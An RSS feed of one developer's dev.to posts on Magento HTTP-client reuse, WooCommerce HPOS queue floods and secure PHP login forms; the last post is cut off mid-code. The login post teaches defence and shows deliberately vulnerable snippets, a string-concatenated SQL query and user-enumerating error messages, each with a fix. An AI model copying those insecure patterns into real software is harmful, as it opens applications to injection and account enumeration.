<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Robin Dhiman</title>
    <description>The latest articles on DEV Community by Robin Dhiman (@iamrobindhiman).</description>
    <link>https://dev.to/iamrobindhiman</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3983853%2Fcd0105a9-6591-488d-93d0-be66eb1f2ba8.jpeg</url>
      <title>DEV Community: Robin Dhiman</title>
      <link>https://dev.to/iamrobindhiman</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/iamrobindhiman"/>
    <language>en</language>
    <item>
      <title>The handshake tax: reuse your HTTP client in Magento integrations</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Fri, 03 Jul 2026 04:25:40 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/the-handshake-tax-reuse-your-http-client-in-magento-integrations-3kk7</link>
      <guid>https://dev.to/iamrobindhiman/the-handshake-tax-reuse-your-http-client-in-magento-integrations-3kk7</guid>
      <description>&lt;p&gt;I had a product export that talked to a third-party pricing API. One product, fast. The full catalog was painfully slow. The database was barely doing anything, so I went looking, and the profiler pointed somewhere I didn't expect: the network, before a single request was even sent.&lt;/p&gt;

&lt;p&gt;The code created a fresh HTTP client on every iteration of the loop.&lt;/p&gt;

&lt;h2&gt;
  
  
  The handshake tax
&lt;/h2&gt;

&lt;p&gt;Before you send one byte of an HTTPS request, the machine does a lot of quiet work.&lt;/p&gt;

&lt;p&gt;A TCP handshake to open the socket. Then a TLS handshake on top: certificate exchange, key negotiation, several round trips across the wire. Only after all of that does your actual &lt;code&gt;GET&lt;/code&gt; or &lt;code&gt;POST&lt;/code&gt; go out.&lt;/p&gt;

&lt;p&gt;Do it once and reuse the connection, you pay that tax once. Do it inside a loop over 40,000 products, you pay it 40,000 times. The request bodies are tiny. The setup is the whole bill.&lt;/p&gt;

&lt;h2&gt;
  
  
  PHP tricks you into it
&lt;/h2&gt;

&lt;p&gt;PHP is share-nothing. Every web request starts cold, so it feels natural to build a client, use it, and throw it away. For a single web request that hits one API once, that's fine. You were going to pay one handshake anyway.&lt;/p&gt;

&lt;p&gt;The trap is the long-running process. A cron job, a &lt;code&gt;bin/magento&lt;/code&gt; console command, a message-queue consumer syncing records to an ERP or a PIM. Those loop. And inside the loop, a lot of Magento integration code looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="k"&gt;foreach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$products&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nv"&gt;$product&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;\GuzzleHttp\Client&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;   &lt;span class="c1"&gt;// new connection every time&lt;/span&gt;
    &lt;span class="nv"&gt;$client&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;post&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'https://api.example.com/sync'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
        &lt;span class="s1"&gt;'json'&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;toPayload&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$product&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="p"&gt;]);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every iteration opens a new connection, runs the full TCP + TLS dance, sends a few hundred bytes, and tears the connection down. The handshake runs N times for N products.&lt;/p&gt;

&lt;h2&gt;
  
  
  Reuse one client
&lt;/h2&gt;

&lt;p&gt;Guzzle keeps the underlying connection alive between requests made on the same client instance. So build it once, outside the loop:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;\GuzzleHttp\Client&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;
    &lt;span class="s1"&gt;'base_uri'&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="s1"&gt;'https://api.example.com'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s1"&gt;'headers'&lt;/span&gt;  &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'Connection'&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="s1"&gt;'keep-alive'&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
&lt;span class="p"&gt;]);&lt;/span&gt;

&lt;span class="k"&gt;foreach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$products&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nv"&gt;$product&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$client&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;post&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'/sync'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'json'&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;toPayload&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$product&lt;/span&gt;&lt;span class="p"&gt;)]);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Same requests, same payloads. But now the socket and the TLS session are reused across the loop. You handshake once, then stream the rest over the open connection.&lt;/p&gt;

&lt;p&gt;In a Magento module, go one step further and don't &lt;code&gt;new&lt;/code&gt; the client at all. Inject a configured client, or a small wrapper service, through the constructor. The same instance gets shared, and the connection survives across the calls that matter.&lt;/p&gt;

&lt;h2&gt;
  
  
  The louder version
&lt;/h2&gt;

&lt;p&gt;In a long-lived runtime the same mistake gets worse. Create a client per call in a hot path and the cost compounds: on top of the repeated handshakes, you can run the machine out of outbound ports, because closed connections pile up in &lt;code&gt;TIME_WAIT&lt;/code&gt; faster than the OS reclaims them. The service stops being able to open new sockets at all. Same root cause, much louder failure.&lt;/p&gt;

&lt;p&gt;PHP's request model usually saves you from that specific cliff. It does not save you from the latency.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to find it
&lt;/h2&gt;

&lt;p&gt;Grep your integration code for clients built inside loops, or hidden in a method that runs once per record:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rn&lt;/span&gt; &lt;span class="s2"&gt;"new .*Client("&lt;/span&gt; app/code | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; http
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Look for any &lt;code&gt;new \GuzzleHttp\Client()&lt;/code&gt; (or a raw &lt;code&gt;curl_init()&lt;/code&gt;) sitting inside a &lt;code&gt;foreach&lt;/code&gt;. That's the line paying the handshake tax on every pass.&lt;/p&gt;

&lt;p&gt;Move the client up, out of the loop, and let the connection stay open. It's a one-line change. On a sync that touches thousands of records, it's the cheapest speedup you'll find all day.&lt;/p&gt;

</description>
      <category>magento2</category>
      <category>php</category>
      <category>performance</category>
      <category>apiintegration</category>
    </item>
    <item>
      <title>WooCommerce HPOS: when order sync floods Action Scheduler</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Tue, 30 Jun 2026 15:18:54 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/woocommerce-hpos-when-order-sync-floods-action-scheduler-2ib</link>
      <guid>https://dev.to/iamrobindhiman/woocommerce-hpos-when-order-sync-floods-action-scheduler-2ib</guid>
      <description>&lt;p&gt;A WooCommerce store starts misbehaving over a weekend. The database is swelling. The PHP error log is growing faster than the database. Background processing runs non-stop, and now you're seeing &lt;code&gt;Deadlock found&lt;/code&gt; and &lt;code&gt;INSERT command denied&lt;/code&gt; in the logs.&lt;/p&gt;

&lt;p&gt;The usual suspects get blamed first. Redis. The page cache. That custom plugin you shipped on Friday. A recent server upgrade.&lt;/p&gt;

&lt;p&gt;None of them are it.&lt;/p&gt;

&lt;h2&gt;
  
  
  What's actually happening
&lt;/h2&gt;

&lt;p&gt;If the store is on &lt;strong&gt;HPOS&lt;/strong&gt; (High-Performance Order Storage, the order tables WooCommerce moved to a couple of years ago), there's a setting most people forget they enabled: compatibility mode.&lt;/p&gt;

&lt;p&gt;HPOS keeps orders in their own tables (&lt;code&gt;wp_wc_orders&lt;/code&gt;, &lt;code&gt;wp_wc_orders_meta&lt;/code&gt;, and friends) instead of the old &lt;code&gt;wp_posts&lt;/code&gt; / &lt;code&gt;wp_postmeta&lt;/code&gt; layout. Compatibility mode keeps both stores in sync so legacy code that still reads &lt;code&gt;wp_postmeta&lt;/code&gt; doesn't break. That sync runs through &lt;strong&gt;Action Scheduler&lt;/strong&gt;, WooCommerce's background job queue.&lt;/p&gt;

&lt;p&gt;Here's the trap. Every order change schedules a sync job. If anything is touching orders in a loop (an importer, a meta-rewriting cron, a plugin that re-saves every order on some hook), each touch enqueues another sync action. Failures get retried. The queue grows faster than the workers drain it, and Action Scheduler stores every one of those rows in your database.&lt;/p&gt;

&lt;p&gt;That's your runaway table. That's your deadlock.&lt;/p&gt;

&lt;h2&gt;
  
  
  Stop guessing. Query the queue.
&lt;/h2&gt;

&lt;p&gt;You don't debug this by disabling plugins one at a time. The queue table tells you exactly what's being scheduled. Action Scheduler keeps its jobs in &lt;code&gt;wp_actionscheduler_actions&lt;/code&gt;. Group them by hook:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;hook&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;status&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;COUNT&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;wp_actionscheduler_actions&lt;/span&gt;
&lt;span class="k"&gt;GROUP&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;hook&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;status&lt;/span&gt;
&lt;span class="k"&gt;ORDER&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="k"&gt;DESC&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One hook will dwarf the rest. That hook name is your culprit — it tells you which subsystem is enqueuing work in a loop. You go from a vague 'something is wrong' to a named process scheduling hundreds of thousands of jobs, in one query.&lt;/p&gt;

&lt;p&gt;This is the same move I make on Magento when &lt;code&gt;cron_schedule&lt;/code&gt; or the message queue balloons: don't audit the whole stack, read the queue and &lt;code&gt;GROUP BY&lt;/code&gt; what's piling up. The component generating the work always names itself.&lt;/p&gt;

&lt;h2&gt;
  
  
  The fix
&lt;/h2&gt;

&lt;p&gt;Two parts.&lt;/p&gt;

&lt;p&gt;First, stop the bleeding. Once you've confirmed the store is fully on HPOS and nothing critical still reads the legacy tables, turn &lt;strong&gt;off&lt;/strong&gt; compatibility mode under WooCommerce → Settings → Advanced → Features. You stop paying the sync tax on every order write. Don't flip this blind on a store full of legacy plugins. Verify they read HPOS first.&lt;/p&gt;

&lt;p&gt;Second, clean up the backlog. Action Scheduler retains completed actions for 30 days by default, which is how a short burst leaves a long tail in your database. Lower the window with the &lt;code&gt;action_scheduler_retention_period&lt;/code&gt; filter and let the cleanup task reclaim the space, or purge completed actions from Tools → Scheduled Actions.&lt;/p&gt;

&lt;h2&gt;
  
  
  The lesson that travels
&lt;/h2&gt;

&lt;p&gt;The platform-specific bit is narrow: HPOS compatibility mode is expensive under heavy order writes. Keep that one for WooCommerce.&lt;/p&gt;

&lt;p&gt;The part that travels to every stack with a job queue: when background processing melts your database, the queue is the evidence, not the suspect list. Don't theorize about Redis. Count the rows by hook. Whatever is flooding you is already labelled.&lt;/p&gt;

</description>
      <category>woocommerce</category>
      <category>wordpress</category>
      <category>performance</category>
      <category>actionscheduler</category>
    </item>
    <item>
      <title>A PHP login form that won't get you owned</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Sun, 28 Jun 2026 16:42:47 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/a-php-login-form-that-wont-get-you-owned-n9n</link>
      <guid>https://dev.to/iamrobindhiman/a-php-login-form-that-wont-get-you-owned-n9n</guid>
      <description>&lt;p&gt;A login form is the most-copied, least-reviewed piece of PHP on the internet. Someone needs auth, they paste a tutorial from 2014, it "works," and it ships. Then it leaks.&lt;/p&gt;

&lt;p&gt;I've reviewed a lot of these. The same five mistakes show up every time. None of them are exotic. All of them are one function call away from being fixed.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Hashing passwords by hand
&lt;/h2&gt;

&lt;p&gt;If your code contains &lt;code&gt;md5()&lt;/code&gt;, &lt;code&gt;sha1()&lt;/code&gt;, or a salt you generated yourself, stop. PHP has had a real password API since 5.5.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="c1"&gt;// On signup&lt;/span&gt;
&lt;span class="nv"&gt;$hash&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;password_hash&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$password&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="no"&gt;PASSWORD_DEFAULT&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// On login&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;password_verify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$password&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$hash&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// authenticated&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;password_hash()&lt;/code&gt; picks a strong algorithm (bcrypt by default, Argon2id if you pass &lt;code&gt;PASSWORD_ARGON2ID&lt;/code&gt;), generates the salt for you, and stores the cost inside the hash string. &lt;code&gt;password_verify()&lt;/code&gt; does a constant-time comparison, so you don't leak timing. You never handle a salt again.&lt;/p&gt;

&lt;p&gt;When you raise the cost later, &lt;code&gt;password_needs_rehash()&lt;/code&gt; lets you re-hash transparently on the user's next login.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Building the query with string concatenation
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Don't&lt;/span&gt;
&lt;span class="nv"&gt;$sql&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"SELECT * FROM users WHERE email = '&lt;/span&gt;&lt;span class="nv"&gt;$email&lt;/span&gt;&lt;span class="s2"&gt;'"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's SQL injection, on the front door of your app. Use a prepared statement and let the driver escape:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$stmt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$pdo&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;prepare&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'SELECT id, password_hash FROM users WHERE email = ?'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nv"&gt;$stmt&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="nv"&gt;$email&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
&lt;span class="nv"&gt;$user&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$stmt&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;fetch&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Select only the columns you need. &lt;code&gt;SELECT *&lt;/code&gt; on a user row pulls fields you'll expose by accident later.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Not regenerating the session ID
&lt;/h2&gt;

&lt;p&gt;This one is invisible until someone exploits it. If you attach the logged-in state to the same session ID the visitor arrived with, you're open to session fixation: an attacker who can plant a victim's session ID before login inherits the authenticated session after.&lt;/p&gt;

&lt;p&gt;One line, right after the password checks out:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nb"&gt;session_regenerate_id&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nv"&gt;$_SESSION&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'user_id'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$user&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'id'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Regenerate on login, and again on logout and any privilege change.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Telling attackers which half they got right
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Leaks which emails exist&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nv"&gt;$user&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'No account with that email'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;elseif&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nb"&gt;password_verify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$password&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$user&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'password_hash'&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'Wrong password'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Two different messages turn your login form into a user-enumeration oracle. An attacker scripts it to learn which emails are registered, then focuses on those.&lt;/p&gt;

&lt;p&gt;Return one message for both cases:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nv"&gt;$user&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nb"&gt;password_verify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$password&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$user&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'password_hash'&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$error&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'Invalid email or password'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To close the timing gap when the user doesn't exist, verify against a dummy hash so both paths do the same work.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. Letting them guess forever
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;password_hash()&lt;/code&gt; is deliberately slow, which buys you a lot. It does not stop someone running a few hundred guesses at one account. That needs rate limiting.&lt;/p&gt;

&lt;p&gt;The cheap version: count failed attempts per email and per IP in a fast store (Redis, or an indexed table), then refuse or delay past a threshold. Reset the counter on success.&lt;/p&gt;

&lt;p&gt;You don't need a library to start. You need a counter and a ceiling.&lt;/p&gt;

&lt;h2&gt;
  
  
  The shape of a correct login
&lt;/h2&gt;

&lt;p&gt;Put together, the whole thing is short:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$stmt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$pdo&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;prepare&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'SELECT id, password_hash FROM users WHERE email = ?'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nv"&gt;$stmt&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="nv"&gt;$email&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
&lt;span class="nv"&gt;$user&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$stmt&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;fetch&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nv"&gt;$user&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nb"&gt;password_verify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$password&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$user&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'password_hash'&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// generic error, bump the rate-limit counter&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;fail&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'Invalid email or password'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nb"&gt;session_regenerate_id&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nv"&gt;$_SESSION&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'user_id'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;int&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;$user&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'id'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No custom crypto. No string-built SQL. One error message. A fresh session. A counter on top.&lt;/p&gt;

&lt;p&gt;None of this is new. &lt;code&gt;password_hash()&lt;/code&gt; landed in PHP 5.5, prepared statements are older still, and &lt;code&gt;session_regenerate_id()&lt;/code&gt; has been there the whole time. The tools are old and boring. The mistakes survive because the tutorials never caught up.&lt;/p&gt;

&lt;p&gt;If you maintain a PHP app with hand-rolled auth, read your login controller today. The fix is usually five small edits, not a rewrite.&lt;/p&gt;

</description>
      <category>php</category>
      <category>security</category>
      <category>backend</category>
    </item>
    <item>
      <title>Enriching a large Magento catalog without melting the indexer</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Fri, 26 Jun 2026 09:16:09 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/enriching-a-large-magento-catalog-without-melting-the-indexer-3mk9</link>
      <guid>https://dev.to/iamrobindhiman/enriching-a-large-magento-catalog-without-melting-the-indexer-3mk9</guid>
      <description>&lt;p&gt;Every few weeks the same question shows up in a Magento forum: thousands of SKUs, missing attributes, thin descriptions, no translations. How do I enrich all of it? The replies are always about sources. Icecat for attributes. An LLM for descriptions. A feed for the marketplace fields.&lt;/p&gt;

&lt;p&gt;Sourcing the data has a thousand tutorials. Getting it into the catalog without taking the store down has almost none. That second part is the actual job.&lt;/p&gt;

&lt;h2&gt;
  
  
  The mistake everyone makes first
&lt;/h2&gt;

&lt;p&gt;You write the obvious loop. Load product, set value, save.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="k"&gt;foreach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$productIds&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nv"&gt;$id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
